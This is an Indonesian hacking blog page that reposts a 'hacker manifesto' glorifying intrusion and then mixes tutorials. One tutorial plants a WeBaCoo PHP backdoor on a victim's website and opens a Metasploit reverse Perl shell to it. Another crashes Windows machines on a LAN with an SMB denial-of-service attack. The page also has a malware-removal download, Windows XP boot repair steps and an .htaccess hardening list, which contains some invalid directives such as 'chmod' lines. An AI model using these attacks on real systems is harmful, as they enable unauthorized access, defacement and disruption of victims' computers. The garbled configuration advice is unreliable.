sekedar info dari new hacking manifesto , new hacking manifesto v.1 ini diterbitkan pertama kali oleh komunitas Phrack Inc , dengan anggota Volume 0x0b, Issue 0x3e, Phile #0x0b of 0x0f , cr4zy c0nsuel0
yang pada saat itu di postingkan di bulletin online :

[1] http://www.phrack.org
[2] http://indohack.sourceforge.net

Oke ini adalah kata kata new hacking manifesto nya :

It happened again today. Another one sold out, sacrificing their dreams to the corporate security machine.

Damn whitehats, noone believes in a cause anymore.

Another bug was released today to the security mailing lists.

Damn Whitehats, they know not what they do.

Another potential computer genius was relegated to an existence of nothing more than than a 9-5 cubicle-dwelling promotional tool.

Damn whitehats, putting money before discovery.

Another family was ravaged by cooperations and governments bent on instituting control over individuality, monitoring every action..

Another kid was sentenced today for searching for a way to understand the world. Convicted and imprisoned, not because of what he did, but because of what others thought he could do.

Damn Whitehats - Fear keeps them in business.

The public, believing anything it hears from "reputed experts". Screaming for blood. Looking for something to blame for their lost hope. Their lost ability to seek out new knowledge. Fear consumes them. They cannot let go of their uncertainty and doubt because there is no meaning. They seek to destroy explorers, outlaws, curiosity seekers because they are told too. They are told these people that seek information are evil. Individuality is evil. Judgment should be made based upon a moral standard set in conformity rather than resistance. Lives are ruined in the name of corporate profit and information is hoarded as a commodity.

Damn Whitehats, you were once like us.

I was a Whitehat. I had an awakening. I saw the security industry for what is really is. I saw the corruption, the lies, the deceit, the extortion of protection money in the form of subscription services and snake-oil security consultants.

I wanted to know, I wanted to understand, I wanted to go further then the rest. I never want to be held down by contracts and agreements.

You say I should grow up. You say I should find better things to do with my time. You say I should put my talent to better use. You're saying I should fall in line with the other zombies and forget everything I believe in and shun those with my drive, my curiosity, tell them it's not worth it, deny them of the greatest journey they will ever experience in their lives.

I am not a blackhat. The term is insulting, it implies I am the opposite of you. You think i seek to defeat security, when I seek something greater. I will write exploits, travel through networks, explore where you are afraid to go. I will not put myself in the spotlight and release destructive tools to the public to attract business. I will not feed the fear and hysteria created by the security industry to increase stock prices. I can, and will, code and hack and find out everything I can for the same reasons I did years ago.

I am a Hacker, dont try to understand me, you lost all hope of that when you crossed the line. You fail to see the lies and utter simplicity behind the computer security industry. Once, you may have shared my ideals. You fail to see the fact that security is a maintenance job. Youve given up hope for something better. You fail to see yourself asworthless, fueling an industry whose cumulative result is nothing. I dont hate you, I dont even really care about you - If you try to stop me, you will fail, because I do this out of love -- you do it for money.

This is our world now.. the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat and lie to us and try to make us belive it is for our own good, yet we're the ciminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You can't stop me, and you certainly can't stop us all.
nah bagaimana ... nih menarik ??
semoga post ini dapat membantu sobat sekalian...

.:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit BLAZTERROR rwxr-xr-x 0 5:16 PM

Filename .:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 5:16 PM
Label
Action


Dear Sobar Blogger, kali ini mas blaz mau sharing trik nih , yaitu Hack / Deface website menggunakan WeBaCoo, WeBaCoo adalah sebuah tools CLI (Command Line) yg menjadi penghubung http antara Attacker (Penyerang) dengan Web Server yang menjadi target kita, disertai dengan pembuatan Web Backdoor tools yg berbasis Perl ini juga memberikan module agar client dapat mengakses melalui metasploit.

sekarang mari kita lihat kronologinya.

Equipments:
1. WeBacoo
2. Metasploit

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu
# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob :


selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit.
# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :


selanjutnya kita cek apakah module tersebut siap di eksekusi:
# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo
# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :
msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan


terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:
# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection
-u = Url Backdoor



.:: Software - Sality Killer 2013 Win:32 Sality Removal BLAZTERROR rwxr-xr-x 0 10:31 PM

Filename .:: Software - Sality Killer 2013 Win:32 Sality Removal
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 10:31 PM
Label
Action


Yo! Sobat blogger blazterzt , pernahkah sobat mengalami gangguan pada komputer PC / Laptop sobat tentang penyerangan virus sality ini. akibat dari sality ini kita banyak mengalami masalah dari mulai shortcut, hardrive, system dan masih banyak masalah yang di timbulkan oleh varian virus ini.

tapi tenang ajah sob, dengan program Sality Killer versi 2013 ini kita dapat membersihkan tuntas sampai bersih deh tuh sality. program ini dibuat khusus untuk membersihkan sality yang tertanam pada PC / laptop kita. Software yang juga dikembangkan oleh Kapersky Antivirus ini memeang mujarab untuk membersihkan sality karena dalam nya penscanan terhadap semua direktori operating system kita , karena memakai system DOS yang lebih dalam pencarian sality nya

Penggunaan yang mudah juga tentunya dapat membuat kita tidak kerepotan karena kita tinggal jalan kan saja program nya , lalu program akan otomatis terscan oleh Sality Killer ini.

Download File : Sality Killer 2013 Win:32 Removal



.:: OS - Cara memperbaiki Windows XP Yang tidak dapat booting BLAZTERROR rwxr-xr-x 0 7:34 PM

Filename .:: OS - Cara memperbaiki Windows XP Yang tidak dapat booting
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 7:34 PM
Label
Action


Dear Sobat blogger blazterzt , pernahkah sobat mengalami masalah dengan booting windows XP ? misal saja saat booting windows xp mengeluarkan error galat seperti ini : Pesan galat "Boot.ini tidak valid" atau "Windows tidak dapat memulai" ketika sobat menghidupkan komputer ? pernah ?
kasus lain misal ketika sobat menghidupkan komputer sobat, sobat mungkin menerima pesan galat seperti ini:

Boot.ini tidak valid
Windows tidak dapat memulai karena berkas berikut ini hilang atau rusak:



NTLDR File Missing
press Any Key to restart



Windows\System32\Hal.dll 


Masalah ini dapat terjadi jika berkas Boot.ini hilang, rusak, atau berisi entri yang tidak sesuai.
kalau begitu coba cara ini untuk memperbaiki masalah sobat :

Untuk memecahkan masalah ini, hidupkan komputer dari CD Windows XP, mulai Konsol Pemulihan, kemudian gunakan alat Bootcfg.exe untuk membuat kembali berkas Boot.ini. Untuk melakukannya, ikuti langkah-langkah berikut ini:
  1. Konfigurasikan komputer untuk memulai dari CD-ROM atau DVD-ROM. Untuk informasi mengenai cara melakukannya, lihat dokumentasi komputer sobat, atau hubungi produsen komputer.
  2. Masukkan CD-ROM Windows XP ke CD-ROM atau DVD-ROM, kemudian mulai ulang komputer.
  3. Apabila sobat menerima pesan "Tekan sembarang tombol untuk boot dari CD", tekan sembarang tombol untuk menghidupkan komputer dari CD-ROM Windows XP.
  4. Ketika sobat menerima pesan "Selamat datang di Recovery", tekan R untuk memulai Konsol Pemulihan.
  5. Jika sobat memiliki komputer dual-boot atau multi-boot, pilih penginstalan yang harus sobat gunakan dari Konsol Pemulihan.
  6. Ketika diminta, ketikkan kata sandi administrator, kemudian tekan ENTER.
  7. Di wantian perintah, ketik bootcfg /list, kemudian tekan ENTER. Entri dalam berkas Boot.ini sekarang ditampilkan pada layar.
  8. Di wantian perintah, ketik bootcfg /rebuild, kemudian tekan ENTER. Perintah ini memindai cakram keras komputer untuk penginstalan Windows XP, Microsoft Windows 2000, atau Microsoft Windows NT, kemudian menampilkan hasilnya. Ikuti petunjuk yang muncul di layar untuk menambahkan penginstalan Windows ke berkas Boot.ini. Contohnya, ikuti langkah berikut ini untuk menambahkan penginstalan Windows XP pada berkas Boot.ini:
    1. Ketika sobat menerima pesan yang sama dengan pesan berikut ini, tekan Y:
      Penginstalan Windows Teridentifikasi Penuh: 1

      [1] C:\Windows
      Tambahkan instalasi ke daftar boot? (Ya/Tidak/Semua)
    2. Sobat menerima pesan yang sama dengan pesan berikut ini:
      Masukkan Pengidentifikasi Muatan
      Ini merupakan nama sistem operasi. Ketika sobat menerima pesan ini, ketik nama dari sistem operasi sobat, kemudian tekan ENTER. Ini bisa Microsoft Windows XP Professional atau Microsoft Windows XP Home Edition.
    3. sobat menerima pesan yang sama dengan berikut ini:
      Masukkan opsi Muatan OS
      Ketika sobat menerima pesan ini , ketik /fastdetect, kemudian tekan ENTER.

      Catatan Petunjuk yang muncul di layar sobat mungkin berbeda, tergantung pada konfigurasi komputer sobat.
  9. Ketik exit, kemudian tekan ENTER untuk keluar dari Konsol Pemulihan. Komputer memulai ulang, dan daftar boot yang mutakhir akan ditampilkan ketika sobat menerima pesan "Silakan pilih sistem operasi untuk memulai".
 Semoga Cara ini dapat membantu sobat , silahkan komentar jika masih ada masalah dalam perbaikan ini.

.:: Hacking - Cara meluncurkan serangan BSOD ke OS Windows BLAZTERROR rwxr-xr-x 0 7:10 PM

Filename .:: Hacking - Cara meluncurkan serangan BSOD ke OS Windows
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 7:10 PM
Label
Action

Dear sobat blogger blazterzt pernahkan sobat mengalami yang namanya BSOD , atau biasa disebut Blue Screen , blue screen of death ini adalah program windows yang memotong error apabila terjadi suatu kesalahan pada operating system nya OS, nah kali ini mas blazt bakal ngasih tut tentang bagaimana meluncurkan suatu serangan ke window OS dengan menggunakan system operasi Linux.

Kondisi :
  1. Kamu harus satu LAN dengan target mu.
  2. Kamu tahu IP dari target mu.
  3. Firewall Target harus dalam keadaan mati.
  4. Target sudah bisa sharing folder / data dalam LAN
  5. kamu tahu folder apa yang dia share
  6. You have a working brain.

Tools
  1. Network mapper : Nmap
  2. Metasploit : here 
1. Untuk mengetahui Ip kamu ketikan pada terminal perintah seperti ini :
ifconfig wlan0
dan ketahuilah IP address sobat yang muncul di sana


yang berwarna merah adalah IP nya.

2. Cari IP dari target yang kamu tuju :

Pada bagian ini, sobat dapat menggunakan tool yang mampu sobat gunakan untuk network assesment. Dalam kasus ini, saya menggunakan Nmap yang lebih cepat (karena bisa lebih cepat dari terminul), dan lebih handal tentunya.

back to recquirement , kita perlu tahu apa target nya menonaktifkan firewall atau tidak, kita juga perlu tahu apa target sharing data / folder tidak ? . Dengan demikian menyimpulkan bahwa :

Pengguna Windows yang tidak mengaktifkan firewall, dapat menjadi ping-ed oleh seseorang, dan membuka port 445 (layanan smb) 

jadi kita cek dibuka atau tidak port 445 nya dengan cara seperti ini :
nmap 192.168.222.1-255 -p 445
Masih ingat alamat IP saya? Ya, Ip saya adalah 192.168.222.1 pada nmap terdapat angka -255. Jadi, bagaimana -255? Ini adalah rentang maks alamat IP. Jadi dalam hal ini, saya ingin memindai jaringan dari 192.168.222.1 sampai 192.168.1.255. Ya, itu adalah alamat IP pada seluruh LAN itu.

Dan bagaimana dengan -p 445? Ini adalah port. Ya, saya cuma menscan IP dengan membuka 445 port di LAN. Dengan demikian akan membuat hasil lebih cepat karena saya akan melewatkan setiap IP dengan 445 port tertutup. jadi hanya port 445 yang terbuka saja yang muncul.

Cobalah untuk menyesuaikan alamat IP sobat. 
Contoh: jika alamat IP sobat adalah 10.20.0.33, maka ketikan perintah berikut :
nmap 10.20.0.1-255 -p 445
Cobalah untuk menghapus nomor terakhir, dan menggantinya dengan angka 1. Jadi sobat dapat memindai alamat IP di atas sobat dari (10.20.0.1 ke 10.20.0.32).

Jadi setelah saya menscan manga akan keluar hasil seperti ini :



dan kita mendapatkan IP 192.168.222.128 dengan port terbuka 445.

3. Cari folder yang di share nya

mungkin sobat bertanya tanya nih, mengapa target harus sharing folder nya ? itu untuk membuat PC / Laptop nya dapat terkena BSOD? Nah, dalam hal ini, saya akan menggunakan metode DOS. Yang bisa membuat sistem turun dengan mengirimkan kode berbahaya dari header order ke service seseorang. Jadi bagaimana untuk mengetahui apakah target sharing foldernya? Nah, sobat dapat menggunakan perintah sederhana ini.

smbclient -L \\TARGET IP -N
 Dalam kasus ini, target saya adalah IP 192.168.222.128. Jadi perintah yg saya gunakan seperti ini lah :
 smbclient -L \\192.168.222.128 -N
dan akan keluar hasil seperti ini :


 4. Meluncurkan Serangan BSOD

Mulai dari konsol Metaesploit
 msfconsole
 dan atur sendiri pengaturanya.


RHOST IP Target sobat, SMBSHARE adalah folder sharinganya.oke semua sudah siap dan kita akan segera mulai meluncurkan serangan BSOD nya :v

 Dan..........


Oke selamat anda telah meretas Komputer korban dengan cara mengirimkan DoS sehingga komputer korban mengalami BLUE SCREEN OF DEATH.!!

Oke sekian tutor dari mas blazt gunakan tut ini sebaik mungkin. semoga dapat membantu .

.:: Security - Cara mengamankan server dengan .htaccess BLAZTERROR rwxr-xr-x 0 5:42 PM

Filename .:: Security - Cara mengamankan server dengan .htaccess
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 5:42 PM
Label
Action

Yo! sobat blogger blazterzt , dalam posting kali ini mas blazt ingin berbagi tips tentang mengamankan sebuah server menggunakan .htaccess , sebelumnya pada tau ga sih apa itu .htaccess nah buat yang belum tahu silahkan kunjungi link berikut untuk lebih jelas nya : en.wikipedia.org/wiki/Htaccess

pengertian .htaccess :
File .htaccess adalah file teks ASCII sederhana yang terletak di direktori www atau di sebuah sub direktori folder www. Anda bisa membuat atau mengedit file ini di Text Editor (Notepad) dan kemudian meng-uploadnya ke direktori yang ingin anda ubah setting-nya. Pastikan bahwa file tersebut diupload dalam format ASCII bukan BINARY, dan pastikan file permission untuk file tersebut telah diset menjadi 644 (rw-r-r–). Hal tersebut memungkinkan server untuk mengakses file tapi mencegah user untuk mengakses file tersebut dari browser mereka.
diatas adalah sedikit pengertian mengenai apa itu .htaccess sekarang adalah tutorial bagaimana cara mengamankan suatu server menggunakan fungsi .htaccess

1. Mencegah Akses ke .htaccess
<Files .htaccess>
order allow,deny
deny from all
</Files>
dimana dengan fungsi ini .htaccess , bila ada usaha untuk mengakses file tersebut akan muncul pesan kesalahan 403 ( Forbiden ). Tentu saja tidak lupa memberi-kan file permissionnya menjadi 644 (rw-r-r–)
O = Read, Write G = Read, E = Read

2. Mencegah akses ke file tertentu
<files config.php>
order allow,deny
deny from all
</files>
dimana dengan fungsi ini .htaccess ,  mencegah akses pada file config.php dimana jika ada seseorang mengakses file tersebut maka akan muncul error code 403 Forbiden.

3. Mencegah akses file lebih dari satu file
 <FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
dimana dengan fungsi ini .htaccess akan melarang penggunaan ekstensi file sesuai dengan yang kita ingin kan dalam contoh diatas adalah file  .htaccess, .htpasswd, .ini , .phps, .fla, .psd, .log, .sh

4. Mencegah user melakukan browsing pada setiap direktori server
Options All -Indexes
dimana dengan fungsi ini kita mencegah setiap kali user browsing pada semua direktori server

5. Mengizinkan user melakukan browsing pada setiap direktori server
Options All +Indexes
dimana dengan fungsi ini kita mengizinkan setiap kali user browsing pada semua direktori server

 6. Mencegah user melakukan browsing tanpa pesan Error 403
IndexIgnore *
dimana dengan fungsi ini kita mencegah user melakukan akses browsing tanpa memunculkan pesan error 403 , sehingga page akan blank / kosong.

7. Mencegah user melakukan browsing dengan membatasi ekstensi file
IndexIgnore *.wmv *.mp4 *.avi *.etc
dimana dengan fungsi ini kita dapat membatasi akses file yang kita inginkan

8. Mengubah laman utama / index file dengan file yang kita inginkan
DirectoryIndex indexbaru.php
dimana dengan fungsi ini kita akan mendirect'an terlebih dahulu / memperioritaskan dahulu file indexbaru.php dari file index asli yaitu misal index.php.

9. Mengubah ekstensi dari file php
AddType application/x-httpd-php .rock

Ini sangat berguna untuk menambahkan keamanan pada aplikasi PHP yang anda buat. anda bisa mengganti extension php pada aplikasi anda dengan extension yang telah anda daftarkan, Mungkin " ROCK" "LOL" "HERP", dll. Nah dengan kode berikut, file tersebut akan tetap dibaca sebagai file PHP. Sedikit catatan, biasanya saya mencari file httpd.conf dan menambahkan extensionnya disitu, akan tetapi inilah kelebihan .htaccess. Kita tidak perlu merubah settingan asli pada Apache. dalam kasus ini saya mengganti nya dengan ekstensi file .rock sehingga yang tadi nya file nya member.php maka akan menjadi file member.rock
kira kira begitu cara kerjanya.

10. Mencegah server dari serangan DoS ( Denial Of Service )
LimitRequestBody 10240000
Ini adalah salah satu metode sederhana yang bisa kita gunakan untuk mencegah serangan DOS. Disini kita membatasi ukuran upload sebesar 10240000 byte yang setara dengan 10 mb.

11. Otomatis mengubah CHMOD dari setiap file
chmod .htpasswd files 640
chmod .htaccess files 644
chmod php files 600
 dengan fungsi ini kita dapat mengubah CHMOD dari file .htpasswd menjadi 640 atau (rw-r-----) dan .htaccess menjadi 644 atau (rw-r--r--)

12. Mengamankan direktori pengaksesan script atau file
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi   
Options -ExecCGI
dengan fungsi ini script script yang di daftarkan tidak akan bisa di akses

13. Menambahkan password dimana file .htaccess berada
resides
AuthType basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user
dengan fungsi ini file pada direktori .htaccess akan dilindungi password

14. Menambahkan password pada file tertentu
<Files config.php>
AuthType Basic
AuthName "Prompt"
AuthUserFile /home/path/.htpasswd
Require valid-user
</Files>
dimana dengan fungsi ini file config.php akan di lindungi oleh password

15. Menambahkan password pada banyak file
<FilesMatch "^(execute|index|secure|insanity|biscuit)*$">
AuthType basic
AuthName "Development"
AuthUserFile /home/path/.htpasswd
Require valid-user
</FilesMatch>
dengan fungsi ini kita dapat melindungi pengaksesan file

16. Membatasi akses hanya dari LAN ( Local Area Network ) tertentu saja
<Limit GET POST PUT>
order deny,allow
deny from all
allow from 192.168.1.5
</Limit>
dengan fungsi ini pengaksesan hanya dapat dilakukan oleh komputer ber IP 192.168.1.5

17. Menambahkan Domain

<Limit GET POST PUT>
order allow,deny
allow from all
deny from 192.168.1.5
deny from .*domain\.com.*
</Limit>
dengan fungsi ini kita mencegah sesuatu dari domain.com

18. Mencegah hotlinking pada server

sebelum nya Hotlinking merupakan pencurian bandwidth melalui penggunaan sebuah image yang akan dipasang pada suatu halaman pada website lain, sehingga bandwidth dari website asal akan tersedot bila image yang dipasang pada website lain itu dibuka.Atau secara simple bisa diterjemahkan, ada orang lain yang mengkopi link image dari website kita dan menempatkannya pada website miliknya.Memang tidak terlalu banyak memakan bandwith akan tetapi hal ini cukup mengganggu.
cara pencegahan nya yaitu :
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} .*jpg$|.*gif$|.*png$ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !websitekamu\.com [NC]
RewriteCond %{HTTP_REFERER} !websiteteman\.com [NC]
RewriteCond %{HTTP_REFERER} !google\. [NC]
RewriteCond %{HTTP_REFERER} !search\?q=cache [NC]
RewriteRule (.*) /gambar.php?pic=$1

dengan .htaccess ini kita dapat mencegah hotlinking terjadi pada user kita.


 

BL4ZTERZT404_ © 2013 BL4ZTERZT404 Blogs All Right Reserved
Thx To B374K and p4r4ghcyb3rn3t, Template Redesign by BL4ZTERZT404 - Blogs

Find Our Facebook!
Join Indonesia Blog Community!